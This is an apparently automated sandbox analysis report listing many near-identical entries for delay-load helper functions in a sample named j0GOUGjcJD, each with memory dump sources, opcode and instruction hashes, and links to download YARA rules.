                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 70745046f432317ff2536a661ebe195f810dda9576d156467d6b3c5e9f44093f
                • Instruction ID: 6258647a70b0169c248ce4a0e5a5f881d0fc4ee2be968299fd07a7db591ef688
                • Opcode Fuzzy Hash: 70745046f432317ff2536a661ebe195f810dda9576d156467d6b3c5e9f44093f
                • Instruction Fuzzy Hash: B5B012B2E6C4426C3108B1076D52E3A075CE7C1B12B30801FB40DD01C0D4445C05443A
                Function 004ED8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7ac388e936605f9b51098664071e7bbc16cf18e1621185067c1ae173e6222519
                • Instruction ID: 13ea7994f0b94b11ec07a33eaec0a8582d6ea7f1b0086f8f5e525efab08f4d16
                • Opcode Fuzzy Hash: 7ac388e936605f9b51098664071e7bbc16cf18e1621185067c1ae173e6222519
                • Instruction Fuzzy Hash: 1FB012B2E6C5426C3148B1077D52E3A075CE7C0B12B30411FB00DD01C0D4845C45443A
                Function 004ED8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d1c1c92740a8bb770fc5a44b2c354bdcbd9444bff9609897aea811097d857b38
                • Instruction ID: 4e39c74eae59fa89e47e11125de50c3eb456bae31d10b8cc176f1bf668d17e76
                • Opcode Fuzzy Hash: d1c1c92740a8bb770fc5a44b2c354bdcbd9444bff9609897aea811097d857b38
                • Instruction Fuzzy Hash: C7B012B2E6C4426C310CB1076D52E3A075CF7C0B12B30401FB00DD01C0D4445C05443A
                Function 004ED8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9f76e57ac3405dfac9dccf856dc6651207384134aa067038f1cc7ebd755cfec9
                • Instruction ID: 62022ffe3ebe98c77404c600e43f794bc07449fd7f9c511f1d0d7d73a2c2b783
                • Opcode Fuzzy Hash: 9f76e57ac3405dfac9dccf856dc6651207384134aa067038f1cc7ebd755cfec9
                • Instruction Fuzzy Hash: 1AB012B2E6C4426C310CB1076E52E3A075CE7C0B12B30401FB00DD01C0D4445D06543A
                Function 004ED891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 12b24d96f86dbbbe917c9f723c278833cde6627b1dd6b3ec0d4118cfa83b190a
                • Instruction ID: 1da23399507a8f64295038bdd237d5d2eb3d8c8be12149da6463e03acc6f9acc
                • Opcode Fuzzy Hash: 12b24d96f86dbbbe917c9f723c278833cde6627b1dd6b3ec0d4118cfa83b190a
                • Instruction Fuzzy Hash: C2B012A6E6C7427C31087103BDA2D3F070CE7C0B12B30852FB40DE00C0D4845C49843A
                Function 004ED8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f232bc53b44499c1eb538204ee4898dc5ee058bb1ea9ee32daf6045a8c3764c3
                • Instruction ID: 2b004de08622c970bc339c7f4f50c0bdd5d75bdd070af597c1628a9298f7c9b8
                • Opcode Fuzzy Hash: f232bc53b44499c1eb538204ee4898dc5ee058bb1ea9ee32daf6045a8c3764c3
                • Instruction Fuzzy Hash: CAB012A6E6C5426C3108B107AD92E3F074CF7C0B12B30801FB40DD01C0D5445C05453A
                Function 004ED8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2d19bc54ac5553c44ae63b9a71ff31c19c0a1769e25bb21137e560157c729f94
                • Instruction ID: 23e259083fdc6add8492a0b3d07a585fd8ef2f99f7dd5328d78e9812dedbb93d
                • Opcode Fuzzy Hash: 2d19bc54ac5553c44ae63b9a71ff31c19c0a1769e25bb21137e560157c729f94
                • Instruction Fuzzy Hash: EFB012A2E6C4426C3108B1076D52E3A074CE7C1B12B30C01FB40DD02C0D4445C0E443A
                Function 004ED942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 444274a167eea3909adb5925637fcdb69cf29f4781238631faceec51553370ba
                • Instruction ID: c7d4ee1afca0c9d063181d120e37aaa3de6e8b0f2ad943d9c7c9f5200cb0caa1
                • Opcode Fuzzy Hash: 444274a167eea3909adb5925637fcdb69cf29f4781238631faceec51553370ba
                • Instruction Fuzzy Hash: 84B012B2E6C5426C310CB1076E52E3A07CCE7C0B12F30401FB00DD01C0D5445C06583A
                Function 004ED906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 85226a0582bd37d19ba62506f0822bae662c4525422c1b43d20783bb1a9dc5a6
                • Instruction ID: c0b90572d3f033eca6575f2f2cfae673ec3654cfd18cf53acbf481cca7d66ee8
                • Opcode Fuzzy Hash: 85226a0582bd37d19ba62506f0822bae662c4525422c1b43d20783bb1a9dc5a6
                • Instruction Fuzzy Hash: 4FB012A2F6D4426C3108B1476D52E3A074DE7C1B12F30801FB50DD01C0D4445C05443A
                Function 004ED910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f7ce2a9daf0277e2d91458595ec83c89a7af61201377e63a52e0b8dde0e917eb
                • Instruction ID: 5f5c929f1ada2c3da8a68886b1442f2a2b994d6704f91a3d705c7abbf1b99ac7
                • Opcode Fuzzy Hash: f7ce2a9daf0277e2d91458595ec83c89a7af61201377e63a52e0b8dde0e917eb
                • Instruction Fuzzy Hash: D4B012B2E6D5426C3148B2477D52E3A074DE7C0B12F30411FB10DD01C0D4845C45443A
                Function 004ED92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5e8e08d7a8610ec1b06464496628a1e3d0b09f9b8172ab3319ddabb7c253d22f
                • Instruction ID: 768f1d6cbb3c1a2f8870710299faff1d1bbf2f98e16aca3caf20c088c995a1bb
                • Opcode Fuzzy Hash: 5e8e08d7a8610ec1b06464496628a1e3d0b09f9b8172ab3319ddabb7c253d22f
                • Instruction Fuzzy Hash: 49B012A2E6C5426C3108B1176D52E3A078CE7C1B12B30801FB50DD01C0D5445C05483A
                Function 004ED924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f0aaf25a1955141276d15c50ceb3bc705ad0408047573194b0e865df9795e005
                • Instruction ID: 391932abe00798598cc7328a3434fe97492cf18ea5af664b1a303161cd519a26
                • Opcode Fuzzy Hash: f0aaf25a1955141276d15c50ceb3bc705ad0408047573194b0e865df9795e005
                • Instruction Fuzzy Hash: 46B012A2E7D4426C3108B1476D52E3A078DFBC0B12F30401FB14DD01C0D4445C05443A
                Function 004EDACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 76d60e2b4414d29190e7c523e20dafd944ad2c59c9c62247e48faa42061be83d
                • Instruction ID: 2d3cf828320e33b9ff323339576b66ab2b0cb1a494918405aacf80520f794f12
                • Opcode Fuzzy Hash: 76d60e2b4414d29190e7c523e20dafd944ad2c59c9c62247e48faa42061be83d
                • Instruction Fuzzy Hash: D7B012B2A6C041AC310CB5076C06E3E078CD3C0B12B30C12FF409C0184D44C4D09483A
                Function 004EDAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 415edab884a7d823c4ffc43c29da84a598b202c0a09b630f166443dd06a5150f
                • Instruction ID: 7059227d7615de2ade45217ba6fdbcda0a8ed5b434fa1d9450b2f549193d5fcf
                • Opcode Fuzzy Hash: 415edab884a7d823c4ffc43c29da84a598b202c0a09b630f166443dd06a5150f
                • Instruction Fuzzy Hash: 47B012A2A6C041AC310CB5076D06F3E078CE3C4B12B30852FF009C0184D4484C0E443A
                Function 004EDB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: cd88f31a7fec95069a55c74912de81abc5a3d00277b0cb3c066ec543f8e02585
                • Instruction ID: 340025386ca675e08bcaf2db481aff481cc5d1010a2c1ebee7fb98ac7715e2f0
                • Opcode Fuzzy Hash: cd88f31a7fec95069a55c74912de81abc5a3d00277b0cb3c066ec543f8e02585
                • Instruction Fuzzy Hash: 02B012A2AAC1416C710CB5076D46F3E078CF3C0B12B30812FF009C0184D5484C09453A
                Function 004EDBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f61d9135021c6a5759d63670643de6196f64ba281764bd273867054be1f1c1a8
                • Instruction ID: 422109feee61d1de10bbc31a846ddb3cc3541eb74e603357ff6d24de30795395
                • Opcode Fuzzy Hash: f61d9135021c6a5759d63670643de6196f64ba281764bd273867054be1f1c1a8
                • Instruction Fuzzy Hash: 82B012A5B7C1467C320C51037C4BD3B071CE3C0B12B30412FB405E00C0EA445C4D403B
                Function 004EDBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
